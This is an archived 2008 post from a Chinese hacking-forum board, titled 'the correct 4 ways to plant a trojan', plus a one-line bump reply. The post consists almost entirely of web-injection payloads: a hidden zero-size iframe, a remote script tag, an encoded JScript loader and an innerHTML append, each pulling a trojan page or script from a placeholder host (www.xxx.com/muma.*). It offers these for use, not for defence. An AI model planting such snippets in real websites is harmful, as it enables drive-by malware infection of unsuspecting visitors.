【3.A.S.T】网络安全爱好者's Archiver

黑客学习

zzp139 发表于 2008-8-10 10:24

正确的4种挂马方式

一、最简单的也是最有效的
[color=#000000]
[font=新宋体][color=#007700]<[/color][color=#0000bb]iframe src[/color][color=#007700]=[/color][color=#0000bb]http[/color][color=#007700]:[/color][color=#ff8000]//www.xxx.com/muma.html width=0 height=0></iframe>[/color]
[/font][/color]
二、js挂马
[color=#000000]
[font=新宋体][color=#007700]<[/color][color=#0000bb]script src[/color][color=#007700]=[/color][color=#0000bb]http[/color][color=#007700]:[/color][color=#ff8000]//www.xxx.com/muma.js></script>[/color]
[/font][/color]
三、js变形加密
[color=#000000]
[font=新宋体][color=#007700]<[/color][color=#0000bb]SCRIPT language[/color][color=#007700]=[/color][color=#dd0000]"JScript.Encode" [/color][color=#0000bb]src[/color][color=#007700]=[/color][color=#0000bb]http[/color][color=#007700]:[/color][color=#ff8000]//www.xxx.com/muma.txt></script>[/color]
[/font][/color]
muma.txt可改成任意后缀的。
四、不是嵌入了与iframe不同
[color=#000000][font=新宋体][color=#0000bb]top[/color][color=#007700].[/color][color=#0000bb]document[/color][color=#007700].[/color][color=#0000bb]body[/color][color=#007700].[/color][color=#0000bb]innerHTML [/color][color=#007700]= [/color][color=#0000bb]top[/color][color=#007700].[/color][color=#0000bb]document[/color][color=#007700].[/color][color=#0000bb]body[/color][color=#007700].[/color][color=#0000bb]innerHTML [/color][color=#007700]+ [/color][color=#dd0000]'\r\n<iframe src="木马地址"></iframe>'[/color][/font][/color]

luojiaming 发表于 2009-7-20 08:24

顶下LZ{:Yem60:Y}

页: [1]

Powered by Discuz! Archiver 7.2  © 2001-2009 Comsenz Inc.